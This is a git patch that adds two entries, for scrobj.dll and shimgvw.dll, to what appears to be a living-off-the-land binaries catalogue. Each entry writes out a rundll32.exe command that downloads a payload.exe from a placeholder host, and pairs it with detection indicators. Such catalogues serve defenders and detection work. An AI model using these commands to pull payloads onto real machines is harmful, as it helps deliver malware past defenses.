From e4c2371a26fc6535d7a7be747be7f0e0eca401ee Mon Sep 17 00:00:00 2001
From: eral4m <92914012+eral4m@users.noreply.github.com>
Date: Sat, 5 Aug 2023 16:50:52 +0100
Subject: [PATCH] Adding scrobj.dll, shimgvw.dll INetCache downloader entries
 (#189)

Co-authored-by: Wietze <wietze@users.noreply.github.com>
---
 yml/OSLibraries/Scrobj.yml  | 23 +++++++++++++++++++++++
 yml/OSLibraries/Shimgvw.yml | 23 +++++++++++++++++++++++
 2 files changed, 46 insertions(+)
 create mode 100644 yml/OSLibraries/Scrobj.yml
 create mode 100644 yml/OSLibraries/Shimgvw.yml

diff --git a/yml/OSLibraries/Scrobj.yml b/yml/OSLibraries/Scrobj.yml
new file mode 100644
index 0000000..5a3ba5c
--- /dev/null
+++ b/yml/OSLibraries/Scrobj.yml
@@ -0,0 +1,23 @@
+---
+Name: Scrobj.dll
+Description: Windows Script Component Runtime
+Author: Eral4m
+Created: 2021-01-07
+Commands:
+  - Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib http://x.x.x.x/payload.exe
+    Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe.
+    Usecase: Download file from remote location.
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: c:\windows\system32\scrobj.dll
+  - Path: c:\windows\syswow64\scrobj.dll
+Detection:
+  - IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line
+Resources:
+  - Link: https://twitter.com/eral4m/status/1479106975967240209
+Acknowledgement:
+  - Person: Eral4m
+    Handle: '@eral4m'
diff --git a/yml/OSLibraries/Shimgvw.yml b/yml/OSLibraries/Shimgvw.yml
new file mode 100644
index 0000000..acf102f
--- /dev/null
+++ b/yml/OSLibraries/Shimgvw.yml
@@ -0,0 +1,23 @@
+---
+Name: Shimgvw.dll
+Description: Photo Gallery Viewer
+Author: Eral4m
+Created: 2021-01-06
+Commands:
+  - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
+    Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'.
+    Usecase: Download file from remote location.
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: c:\windows\system32\shimgvw.dll
+  - Path: c:\windows\syswow64\shimgvw.dll
+Detection:
+  - IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line
+Resources:
+  - Link: https://twitter.com/eral4m/status/1479080793003671557
+Acknowledgement:
+  - Person: Eral4m
+    Handle: '@eral4m'